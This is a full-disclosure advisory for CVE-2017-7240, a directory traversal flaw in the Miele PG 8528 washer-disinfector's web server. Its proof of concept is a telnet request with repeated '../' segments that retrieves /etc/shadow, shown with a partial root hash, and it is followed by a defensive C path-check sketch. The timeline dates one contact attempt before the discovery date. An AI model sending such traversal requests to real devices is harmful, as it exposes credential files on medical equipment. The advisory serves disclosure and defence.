
List:       full-disclosure
Subject:    [FD] [CVE-2017-7240] Miele Professional PG 8528 - Web Server Directory Traversal
From:       Jens Regel <jregel () schneider-wulf ! de>
Date:       2017-03-24 7:27:26
Message-ID: 1704c2d8-bf3a-c618-4eba-064ee03751df () schneider-wulf ! de

Title:
======
Miele Professional PG 8528 - Web Server Directory Traversal

Author:
=======
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
=======
CVE-2017-7240

Risk Information:
=================
Risk Factor: Medium
CVSS Base Score: 5.0
CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS Temporal Vector: CVSS2#E:POC/RL:OF/RC:C
CVSS Temporal Score: 3.9

Timeline:
=========
2016-11-16 Vulnerability discovered
2016-11-10 Asked for security contact
2016-11-21 Contact with Miele product representative
2016-12-03 Sent details to the Miele product representative
2017-01-19 Asked for update, no response
2017-02-03 Asked for update, no response
2017-03-23 Public disclosure

Status:
=======
Published

Affected Products:
==================
Miele Professional PG 8528 (washer-disinfector) with Ethernet interface.

Vendor Homepage:
================
https://www.miele.co.uk/professional/large-capacity-washer-disinfectors-560.htm?mat=10339600&name=PG_8528

Details:
========
The corresponding embedded web server "PST10 WebServer" typically listens
on port 80 and is prone to a directory traversal attack. An
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aid in subsequent attacks.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename="./etc/shadow"
Accept-Ranges: bytes
Content-Length: 52

root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::

Fix:
====
We are not aware of an actual fix.
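
Added example (not part of the original advisory and not vendor code): a
sketch of the server-side check that would refuse the request shown in the
Proof of Concept, by resolving the request path segment by segment and
rejecting any ".." that would climb above the document root. The DOCROOT
value and the function name resolve_request_path are hypothetical, and the
input is assumed to be percent-decoded already.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical document root; the advisory does not state the real one. */
#define DOCROOT "/www"

/* Lexically resolve an already percent-decoded request path under DOCROOT.
 * Returns 0 and writes the file path to out, or -1 if the request must be
 * refused. Purely lexical: symlinks inside DOCROOT are not examined. */
int resolve_request_path(const char *req, char *out, size_t outlen)
{
    size_t root = strlen(DOCROOT), len = root;

    if (req == NULL || req[0] != '/' || strchr(req, '\\') || outlen <= root)
        return -1;
    memcpy(out, DOCROOT, root + 1);

    for (const char *p = req; *p != '\0'; ) {
        while (*p == '/') p++;                  /* collapse repeated slashes */
        size_t n = strcspn(p, "/");             /* length of this segment */
        if (n == 0) break;
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (len == root) return -1;         /* would leave DOCROOT: refuse */
            do { len--; } while (out[len] != '/');  /* drop last segment */
            out[len] = '\0';
        } else if (!(n == 1 && p[0] == '.')) {  /* a lone "." is skipped */
            if (len + 1 + n >= outlen) return -1;   /* would overflow out */
            out[len++] = '/';
            memcpy(out + len, p, n);
            len += n;
            out[len] = '\0';
        }
        p += n;
    }
    return 0;
}

int main(void)
{
    char path[256];
    /* Constructed requests; the second is the PoC request path from above. */
    const char *reqs[] = { "/index.html",
        "/../../../../../../../../../../../../etc/shadow", "/img/../a//b/./c.css" };
    for (size_t i = 0; i < 3; i++)
        printf("%-50s -> %s\n", reqs[i],
               resolve_request_path(reqs[i], path, sizeof path) ? "REFUSED" : path);
    return 0;
}
```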
